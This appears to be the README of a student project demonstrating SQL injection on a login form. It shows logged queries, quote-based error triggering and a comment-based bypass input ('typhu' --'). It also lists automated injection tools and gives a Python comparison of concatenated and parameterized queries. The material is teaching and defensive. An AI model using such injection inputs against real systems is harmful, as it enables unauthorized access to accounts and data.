tquangsdh20/demo_sql_injection


Members:

  • Tran Quang
  • Nguyen Hoang Dinh Quy
  • Than Hai Nhat Minh
  • Nguyen Ty Phu

Introduction

What is SQL Injection?

What are its effects?

Demo Attacks

Log in

user: quang
password: demo

Console log output:

>> SELECT user
>>    ,checking
>>    ,savings
>> FROM accounts
>> WHERE "user" = 'typhu' AND "password" = 'demo' LIMIT 1;

Try another user

Try with any password

user: typhu
password: demo

Try to trigger an error

user: typhu
password: demo'

Analyze the log output

SELECT user
    ,checking
    ,savings
FROM accounts
WHERE "user" = 'typhu' AND "password" = 'demo'' LIMIT 1;

Try to trigger an error

user: typhu'
password: demo

SELECT user
    ,checking
    ,savings
FROM accounts
WHERE "user" = 'typhu'' AND "password" = 'demo' LIMIT 1;

Add comment

WHERE "user" = 'typhu' --' AND "password" = 'demo' LIMIT 1;

Hacking Tools

  • SQLMap : Automatic SQL Injection And Database Takeover Tool
  • jSQL Injection : Java Tool For Automatic SQL Database Injection
  • BBQSQL : A Blind SQL Injection Exploitation Tool
  • NoSQLMap : Automated NoSQL Database Pwnage

How to protect your database from SQL Injection
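
As an added example (not code from this repository), the login query from the log output above is built once by string concatenation and once with bound parameters, using Python's sqlite3 and a constructed in-memory accounts table. The function names, the sample balances and the password for typhu are assumptions made for the example.

```python
import sqlite3

def make_db():
    # Constructed sample data; column names follow the query in the log output.
    # Plaintext passwords mirror the demo's query; real systems store password hashes.
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE accounts ("user" TEXT, "password" TEXT, '
               'checking INTEGER, savings INTEGER)')
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)",
                   [("quang", "demo", 100, 200), ("typhu", "s3cret", 300, 400)])
    return db

def login_concatenated(db, user, password):
    # Vulnerable form: input is pasted into the SQL text, so a quote in the
    # input changes the structure of the statement.
    sql = ('SELECT "user", checking, savings FROM accounts '
           f"WHERE \"user\" = '{user}' AND \"password\" = '{password}' LIMIT 1;")
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The stray quote from the "trigger an error" step surfaces here.
        return f"SQL error: {exc}"

def login_parameterized(db, user, password):
    # Hardened form: the SQL text is fixed; values are bound separately and
    # are never parsed as SQL, so quotes and "--" stay ordinary characters.
    sql = ('SELECT "user", checking, savings FROM accounts '
           'WHERE "user" = ? AND "password" = ? LIMIT 1;')
    return db.execute(sql, (user, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    # The three inputs used in the demo steps above.
    attempts = [("quang", "demo"), ("typhu", "demo'"), ("typhu' --", "demo")]
    for user, password in attempts:
        print(repr(user), repr(password))
        print("  concatenated :", login_concatenated(db, user, password))
        print("  parameterized:", login_parameterized(db, user, password))
```

With bound parameters, the inputs that broke or bypassed the concatenated query simply match no row.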

About

Demo SQL Injection for Database Security
